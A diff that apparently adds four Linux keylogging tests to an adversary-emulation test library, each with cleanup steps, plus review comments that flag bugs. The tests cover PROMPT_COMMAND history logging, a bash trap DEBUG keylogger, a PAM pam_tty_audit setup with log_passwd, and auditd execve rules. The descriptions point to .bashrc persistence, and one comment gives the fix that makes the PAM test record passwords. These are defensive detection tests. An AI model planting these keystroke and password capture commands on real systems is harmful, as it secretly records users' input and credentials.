diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 48fab1bd..d4fe89f6 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -32,6 +32,10 @@ credential-access,T1558.003,Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497
credential-access,T1555.001,Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh
credential-access,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
+credential-access,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
+credential-access,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,command_prompt
+credential-access,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,command_prompt
+credential-access,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,command_prompt
credential-access,T1003.004,LSA Secrets,1,Dumping LSA Secrets,55295ab0-a703-433b-9ca4-ae13807de12f,command_prompt
credential-access,T1003.001,LSASS Memory,1,Windows Credential Editor,0f7c5301-6859-45ba-8b4d-1fac30fc31ed,command_prompt
credential-access,T1003.001,LSASS Memory,2,Dump LSASS.exe Memory using ProcDump,0be2230c-9ab3-4ac2-8826-3199b9a0ebf8,command_prompt
@@ -109,6 +113,10 @@ collection,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,
collection,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
collection,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
collection,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
+collection,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
+collection,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,command_prompt
+collection,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,command_prompt
+collection,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,command_prompt
collection,T1074.001,Local Data Staging,1,Stage data from Discovery.bat,107706a5-6f9f-451a-adae-bab8c667829f,powershell
collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
collection,T1074.001,Local Data Staging,3,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell
diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv
index a87b19bb..539fcfdf 100644
--- a/atomics/Indexes/Indexes-CSV/linux-index.csv
+++ b/atomics/Indexes/Indexes-CSV/linux-index.csv
@@ -8,6 +8,10 @@ credential-access,T1110.004,Credential Stuffing,1,SSH Credential Stuffing From L
credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
+credential-access,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
+credential-access,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,command_prompt
+credential-access,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,command_prompt
+credential-access,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,command_prompt
credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash
credential-access,T1110.001,Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell
credential-access,T1110.003,Password Spraying,4,Password spray all Azure AD users with a single password,a8aa2d3e-1c52-4016-bc73-0f8854cfa80a,powershell
@@ -26,6 +30,10 @@ collection,T1560.001,Archive via Utility,6,Data Compressed - nix - gzip Single F
collection,T1560.001,Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
collection,T1560.001,Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
collection,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
+collection,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
+collection,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,command_prompt
+collection,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,command_prompt
+collection,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,command_prompt
collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index f02535b2..441c083d 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -59,6 +59,10 @@
- [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #1: Input Capture [windows]
- Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
+ - Atomic Test #3: Logging bash history to syslog [linux]
+ - Atomic Test #4: Bash session based keylogger [linux]
+ - Atomic Test #5: SSHD PAM keylogger [linux]
+ - Atomic Test #6: Auditd keylogger [linux]
- T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1003.004 LSA Secrets](../../T1003.004/T1003.004.md)
- Atomic Test #1: Dumping LSA Secrets [windows]
@@ -189,6 +193,10 @@
- [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #1: Input Capture [windows]
- Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
+ - Atomic Test #3: Logging bash history to syslog [linux]
+ - Atomic Test #4: Bash session based keylogger [linux]
+ - Atomic Test #5: SSHD PAM keylogger [linux]
+ - Atomic Test #6: Auditd keylogger [linux]
- T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md)
- Atomic Test #1: Stage data from Discovery.bat [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md
index d8878c2a..6d926267 100644
--- a/atomics/Indexes/Indexes-Markdown/linux-index.md
+++ b/atomics/Indexes/Indexes-Markdown/linux-index.md
@@ -23,6 +23,10 @@
- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
+ - Atomic Test #3: Logging bash history to syslog [linux]
+ - Atomic Test #4: Bash session based keylogger [linux]
+ - Atomic Test #5: SSHD PAM keylogger [linux]
+ - Atomic Test #6: Auditd keylogger [linux]
- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -83,6 +87,10 @@
- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
+ - Atomic Test #3: Logging bash history to syslog [linux]
+ - Atomic Test #4: Bash session based keylogger [linux]
+ - Atomic Test #5: SSHD PAM keylogger [linux]
+ - Atomic Test #6: Auditd keylogger [linux]
- [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md)
- Atomic Test #2: Stage data from Discovery.sh [linux, macos]
- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 93d419bd..0f807a6d 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -2688,6 +2688,148 @@ credential-access:
sudo cp -f /tmp/system-auth.bk /etc/pam.d/system-auth
name: sh
elevation_required: true
+ - name: Logging bash history to syslog
+ auto_generated_guid: 0e59d59d-3265-4d35-bebd-bf5c1ec40db5
+ description: "There are several variables that can be set to control the appearance
+ of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents
+ of these variables are executed as if they had been typed on the command line.
+ The PROMPT_COMMAND variable \"if set\" will be executed before the PS1 variable
+ and can be configured to write the latest \"bash history\" entries to the
+ syslog.\n\nTo gain persistence the command could be added to the users .bashrc
+ or .bash_aliases or the systems default .bashrc in /etc/skel/ \n"
+ supported_platforms:
+ - linux
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'This test requires to be run in a bash shell and that logger
+ and tee are installed.
+
+'
+ prereq_command: |
+ if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi
+ if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi
+ if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi
+ get_prereq_command: 'echo ""
+
+'
+ executor:
+ name: sh
+ elevation_required: true
+ command: |
+ PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t "$USER[$$] $SSH_CONNECTION ")'
+ echo "\$PROMPT_COMMAND=$PROMPT_COMMAND"
+ tail /var/log/syslog
+ cleanup_command: 'unset PROMPT_COMMAND
+
+'
+ - name: Bash session based keylogger
+ auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258
+ description: "When a command is executed in bash, the BASH_COMMAND variable
+ contains that command. For example :~$ echo $BASH_COMMAND = \"echo $BASH_COMMAND\".
+ The trap command is not a external command, but a built-in function of bash
+ and can be used in a script to run a bash function when some event occurs.
+ trap will detect when the BASH_COMMAND variable value changes and then pipe
+ that value into a file, creating a bash session based keylogger. \n\nTo gain
+ persistence the command could be added to the users .bashrc or .bash_aliases
+ or the systems default .bashrc in /etc/skel/ \n"
+ supported_platforms:
+ - linux
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'This test requires to be run in a bash shell
+
+'
+ prereq_command: 'if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n*****
+ Bash not running! *****\n"; exit 1; fi
+
+'
+ get_prereq_command: 'echo ""
+
+'
+ input_arguments:
+ output_file:
+ name: output_file
+ description: File to store captured commands
+ type: String
+ default: "/tmp/.keyboard.log"
+ executor:
+ name: command_prompt
+ elevation_required: false
+ command: |
+ trap 'echo "$(date +"%d/%m/%y %H:%M:%S.%s") $USER $BASH_COMMAND" >> #{output_file}' DEBUG
+ echo "Hello World!"
+ cat #{output_file}
+ cleanup_command: 'rm #{output_file}
+
+'
+ - name: SSHD PAM keylogger
+ auto_generated_guid: 81d7d2ad-d644-4b6a-bea7-28ffe43becca
+ description: 'Linux PAM (Pluggable Authentication Modules) is used in sshd authentication.
+ The Linux audit tool auditd can use the pam_tty_audit module to enable auditing
+ of TTY input and capture all keystrokes in a ssh session and place them in
+ the /var/log/audit/audit.log file after the session closes.
+
+'
+ supported_platforms:
+ - linux
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'This test requires sshd and auditd
+
+'
+ prereq_command: |
+ if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi
+ if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi
+ get_prereq_command: 'echo ""
+
+'
+ input_arguments:
+ user_account:
+ description: Basic ssh user account for testing.
+ type: string
+ default: ubuntu
+ executor:
+ name: command_prompt
+ elevation_required: true
+ command: "cp -v /etc/pam.d/sshd /tmp/\necho >> \"session required pam_tty_audit.so
+ disable=* enable=* open_only log_passwd\"\nsystemctl restart sshd\nsystemctl
+ restart auditd\nssh #{user_account}@localhost \nwhoami\nsudo su\nwhoami\nexit\nexit\n"
+ cleanup_command: 'cp -fv /tmp/sshd /etc/pam.d/
+
+'
+ - name: Auditd keylogger
+ auto_generated_guid: a668edb9-334e-48eb-8c2e-5413a40867af
+ description: "The linux audit tool auditd can be used to capture 32 and 64 bit
+ command execution and place the command in the /var/log/audit/audit.log audit
+ log. \n"
+ supported_platforms:
+ - linux
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'This test requires sshd and auditd
+
+'
+ prereq_command: 'if [ ! -x "$(command -v auditd)" ]; then echo -e "\n*****
+ auditd NOT installed *****\n"; exit 1; fi
+
+'
+ get_prereq_command: 'echo ""
+
+'
+ input_arguments:
+ output_file:
+ description: description
+ type: type
+ default: default
+ executor:
+ name: command_prompt
+ elevation_required: true
+ command: "auditctl -a always,exit -F arch=b64 -S execve -k CMDS \nauditctl
+ -a always,exit -F arch=b32 -S execve -k CMDS\nwhoami; ausearch -i --start
+ $(date +\"%d/%m/%y %H:%M:%S\") \n"
+ cleanup_command: 'systemctl restart auditd
+
+'
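Review bot: The "SSHD PAM keylogger" command never modifies /etc/pam.d/sshd — `echo >> "session required pam_tty_audit.so disable=* enable=* open_only log_passwd"` redirects an empty line into a file literally named by the quoted string in the current directory, so pam_tty_audit is never enabled and the ssh session that follows generates none of the audit telemetry the description promises. The intended line is `echo "session required pam_tty_audit.so disable=* enable=* open_only log_passwd" >> /etc/pam.d/sshd`. Once that is fixed, `log_passwd` writes passwords typed on the TTY (including the `sudo su` password) in plaintext to /var/log/audit/audit.log, and the cleanup only copies /tmp/sshd back without restarting sshd or purging that log, so the test should state that the log must be cleared after the run. The `whoami`/`sudo su`/`exit` lines after `ssh #{user_account}@localhost` are separate shell commands rather than input to the ssh session, so under a non-interactive executor they presumably run locally after ssh returns — feeding them via a here-doc or `ssh ... 'whoami; sudo -S whoami'` would make the test self-contained.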
T1557.001:
technique:
external_references:
@@ -8325,6 +8467,148 @@ collection:
sudo cp -f /tmp/system-auth.bk /etc/pam.d/system-auth
name: sh
elevation_required: true
+ - name: Logging bash history to syslog
+ auto_generated_guid: 0e59d59d-3265-4d35-bebd-bf5c1ec40db5
+ description: "There are several variables that can be set to control the appearance
+ of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents
+ of these variables are executed as if they had been typed on the command line.
+ The PROMPT_COMMAND variable \"if set\" will be executed before the PS1 variable
+ and can be configured to write the latest \"bash history\" entries to the
+ syslog.\n\nTo gain persistence the command could be added to the users .bashrc
+ or .bash_aliases or the systems default .bashrc in /etc/skel/ \n"
+ supported_platforms:
+ - linux
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'This test requires to be run in a bash shell and that logger
+ and tee are installed.
+
+'
+ prereq_command: |
+ if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi
+ if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi
+ if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi
+ get_prereq_command: 'echo ""
+
+'
+ executor:
+ name: sh
+ elevation_required: true
+ command: |
+ PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t "$USER[$$] $SSH_CONNECTION ")'
+ echo "\$PROMPT_COMMAND=$PROMPT_COMMAND"
+ tail /var/log/syslog
+ cleanup_command: 'unset PROMPT_COMMAND
+
+'
+ - name: Bash session based keylogger
+ auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258
+ description: "When a command is executed in bash, the BASH_COMMAND variable
+ contains that command. For example :~$ echo $BASH_COMMAND = \"echo $BASH_COMMAND\".
+ The trap command is not a external command, but a built-in function of bash
+ and can be used in a script to run a bash function when some event occurs.
+ trap will detect when the BASH_COMMAND variable value changes and then pipe
+ that value into a file, creating a bash session based keylogger. \n\nTo gain
+ persistence the command could be added to the users .bashrc or .bash_aliases
+ or the systems default .bashrc in /etc/skel/ \n"
+ supported_platforms:
+ - linux
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'This test requires to be run in a bash shell
+
+'
+ prereq_command: 'if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n*****
+ Bash not running! *****\n"; exit 1; fi
+
+'
+ get_prereq_command: 'echo ""
+
+'
+ input_arguments:
+ output_file:
+ name: output_file
+ description: File to store captured commands
+ type: String
+ default: "/tmp/.keyboard.log"
+ executor:
+ name: command_prompt
+ elevation_required: false
+ command: |
+ trap 'echo "$(date +"%d/%m/%y %H:%M:%S.%s") $USER $BASH_COMMAND" >> #{output_file}' DEBUG
+ echo "Hello World!"
+ cat #{output_file}
+ cleanup_command: 'rm #{output_file}
+
+'
+ - name: SSHD PAM keylogger
+ auto_generated_guid: 81d7d2ad-d644-4b6a-bea7-28ffe43becca
+ description: 'Linux PAM (Pluggable Authentication Modules) is used in sshd authentication.
+ The Linux audit tool auditd can use the pam_tty_audit module to enable auditing
+ of TTY input and capture all keystrokes in a ssh session and place them in
+ the /var/log/audit/audit.log file after the session closes.
+
+'
+ supported_platforms:
+ - linux
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'This test requires sshd and auditd
+
+'
+ prereq_command: |
+ if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi
+ if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi
+ get_prereq_command: 'echo ""
+
+'
+ input_arguments:
+ user_account:
+ description: Basic ssh user account for testing.
+ type: string
+ default: ubuntu
+ executor:
+ name: command_prompt
+ elevation_required: true
+ command: "cp -v /etc/pam.d/sshd /tmp/\necho >> \"session required pam_tty_audit.so
+ disable=* enable=* open_only log_passwd\"\nsystemctl restart sshd\nsystemctl
+ restart auditd\nssh #{user_account}@localhost \nwhoami\nsudo su\nwhoami\nexit\nexit\n"
+ cleanup_command: 'cp -fv /tmp/sshd /etc/pam.d/
+
+'
+ - name: Auditd keylogger
+ auto_generated_guid: a668edb9-334e-48eb-8c2e-5413a40867af
+ description: "The linux audit tool auditd can be used to capture 32 and 64 bit
+ command execution and place the command in the /var/log/audit/audit.log audit
+ log. \n"
+ supported_platforms:
+ - linux
+ dependency_executor_name: sh
+ dependencies:
+ - description: 'This test requires sshd and auditd
+
+'
+ prereq_command: 'if [ ! -x "$(command -v auditd)" ]; then echo -e "\n*****
+ auditd NOT installed *****\n"; exit 1; fi
+
+'
+ get_prereq_command: 'echo ""
+
+'
+ input_arguments:
+ output_file:
+ description: description
+ type: type
+ default: default
+ executor:
+ name: command_prompt
+ elevation_required: true
+ command: "auditctl -a always,exit -F arch=b64 -S execve -k CMDS \nauditctl
+ -a always,exit -F arch=b32 -S execve -k CMDS\nwhoami; ausearch -i --start
+ $(date +\"%d/%m/%y %H:%M:%S\") \n"
+ cleanup_command: 'systemctl restart auditd
+
+'
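Review bot: The "Auditd keylogger" cleanup `systemctl restart auditd` does not explicitly remove the two execve rules added with `auditctl -a`, and on distributions whose auditd unit refuses manual stop/restart the command fails outright, leaving a permanent execve logging rule on the host after the test; the cleanup should delete by key, `auditctl -D -k CMDS`. The `output_file` input argument carries the literal placeholders `description`/`type`/`default` and is never referenced by the command, so it should be removed or filled in. `ausearch -i --start $(date +"%d/%m/%y %H:%M:%S")` passes a day-first date while ausearch parses dates per the current locale (month-first under en_US), which can yield "invalid start date" or a wrong window — `ausearch -i -k CMDS` keyed on the rule is simpler and locale-independent. The dependency description says "requires sshd and auditd" but only auditd is checked, which looks like a copy-paste from the previous test.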
T1557.001:
technique:
external_references:
diff --git a/atomics/T1056.001/T1056.001.md b/atomics/T1056.001/T1056.001.md
index 88c11054..72a6bc3e 100644
--- a/atomics/T1056.001/T1056.001.md
+++ b/atomics/T1056.001/T1056.001.md
@@ -16,6 +16,14 @@ Keylogging is the most prevalent type of input capture, with many different ways
- [Atomic Test #2 - Living off the land Terminal Input Capture on Linux with pam.d](#atomic-test-2---living-off-the-land-terminal-input-capture-on-linux-with-pamd)
+- [Atomic Test #3 - Logging bash history to syslog](#atomic-test-3---logging-bash-history-to-syslog)
+
+- [Atomic Test #4 - Bash session based keylogger](#atomic-test-4---bash-session-based-keylogger)
+
+- [Atomic Test #5 - SSHD PAM keylogger](#atomic-test-5---sshd-pam-keylogger)
+
+- [Atomic Test #6 - Auditd keylogger](#atomic-test-6---auditd-keylogger)
+
@@ -107,4 +115,217 @@ echo "Sorry, you must install module pam_tty_audit.so and recompile, for this te
+
+
+
+## Atomic Test #3 - Logging bash history to syslog
+There are several variables that can be set to control the appearance of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents of these variables are executed as if they had been typed on the command line. The PROMPT_COMMAND variable "if set" will be executed before the PS1 variable and can be configured to write the latest "bash history" entries to the syslog.
+
+To gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 0e59d59d-3265-4d35-bebd-bf5c1ec40db5
+
+
+
+
+
+
+#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
+
+
+```sh
+PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t "$USER[$$] $SSH_CONNECTION ")'
+echo "\$PROMPT_COMMAND=$PROMPT_COMMAND"
+tail /var/log/syslog
+```
+
+#### Cleanup Commands:
+```sh
+unset PROMPT_COMMAND
+```
+
+
+
+#### Dependencies: Run with `sh`!
+##### Description: This test requires to be run in a bash shell and that logger and tee are installed.
+##### Check Prereq Commands:
+```sh
+if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi
+if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi
+if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi
+```
+##### Get Prereq Commands:
+```sh
+echo ""
+```
+
+
+
+
+
+
+
+## Atomic Test #4 - Bash session based keylogger
+When a command is executed in bash, the BASH_COMMAND variable contains that command. For example :~$ echo $BASH_COMMAND = "echo $BASH_COMMAND". The trap command is not a external command, but a built-in function of bash and can be used in a script to run a bash function when some event occurs. trap will detect when the BASH_COMMAND variable value changes and then pipe that value into a file, creating a bash session based keylogger.
+
+To gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 7f85a946-a0ea-48aa-b6ac-8ff539278258
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| output_file | File to store captured commands | String | /tmp/.keyboard.log|
+
+
+#### Attack Commands: Run with `command_prompt`!
+
+
+```cmd
+trap 'echo "$(date +"%d/%m/%y %H:%M:%S.%s") $USER $BASH_COMMAND" >> #{output_file}' DEBUG
+echo "Hello World!"
+cat #{output_file}
+```
+
+#### Cleanup Commands:
+```cmd
+rm #{output_file}
+```
+
+
+
+#### Dependencies: Run with `sh`!
+##### Description: This test requires to be run in a bash shell
+##### Check Prereq Commands:
+```sh
+if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi
+```
+##### Get Prereq Commands:
+```sh
+echo ""
+```
+
+
+
+
+
+
+
+## Atomic Test #5 - SSHD PAM keylogger
+Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. The Linux audit tool auditd can use the pam_tty_audit module to enable auditing of TTY input and capture all keystrokes in a ssh session and place them in the /var/log/audit/audit.log file after the session closes.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 81d7d2ad-d644-4b6a-bea7-28ffe43becca
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| user_account | Basic ssh user account for testing. | string | ubuntu|
+
+
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
+
+
+```cmd
+cp -v /etc/pam.d/sshd /tmp/
+echo >> "session required pam_tty_audit.so disable=* enable=* open_only log_passwd"
+systemctl restart sshd
+systemctl restart auditd
+ssh #{user_account}@localhost
+whoami
+sudo su
+whoami
+exit
+exit
+```
+
+#### Cleanup Commands:
+```cmd
+cp -fv /tmp/sshd /etc/pam.d/
+```
+
+
+
+#### Dependencies: Run with `sh`!
+##### Description: This test requires sshd and auditd
+##### Check Prereq Commands:
+```sh
+if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi
+if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi
+```
+##### Get Prereq Commands:
+```sh
+echo ""
+```
+
+
+
+
+
+
+
+## Atomic Test #6 - Auditd keylogger
+The linux audit tool auditd can be used to capture 32 and 64 bit command execution and place the command in the /var/log/audit/audit.log audit log.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** a668edb9-334e-48eb-8c2e-5413a40867af
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| output_file | description | type | default|
+
+
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
+
+
+```cmd
+auditctl -a always,exit -F arch=b64 -S execve -k CMDS
+auditctl -a always,exit -F arch=b32 -S execve -k CMDS
+whoami; ausearch -i --start $(date +"%d/%m/%y %H:%M:%S")
+```
+
+#### Cleanup Commands:
+```cmd
+systemctl restart auditd
+```
+
+
+
+#### Dependencies: Run with `sh`!
+##### Description: This test requires sshd and auditd
+##### Check Prereq Commands:
+```sh
+if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi
+```
+##### Get Prereq Commands:
+```sh
+echo ""
+```
+
+
+
+
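Review bot: Tests #3 and #4 rely on bash-only features — `>(…)` process substitution and `history -a` in #3, `trap … DEBUG` and `$BASH_COMMAND` in #4 — yet are declared to run with `sh` / `command_prompt`, and the prereq `if [ "$(echo $SHELL)" != "/bin/bash" ]` checks the user's login shell rather than the interpreter the executor actually launches; under a dash `/bin/sh` the first is a syntax error and the second silently logs nothing. The repository already has a `bash` executor (used by the Local Data Staging test), so these two should use `bash` and check `if [ -z "$BASH_VERSION" ]; then echo "***** Bash not running! *****"; exit 1; fi`. In #3, `PROMPT_COMMAND` only fires before an interactive prompt, so a non-interactive run writes nothing to syslog and `tail /var/log/syslog` shows pre-existing lines (and that path is Debian-family specific; journald/`/var/log/messages` elsewhere) — the doc should say the command must be pasted into an interactive bash session to observe the logger entries. In #4, `%s` in `date +"%d/%m/%y %H:%M:%S.%s"` is the epoch in seconds, not a fractional-second field; `%N` is presumably what was intended.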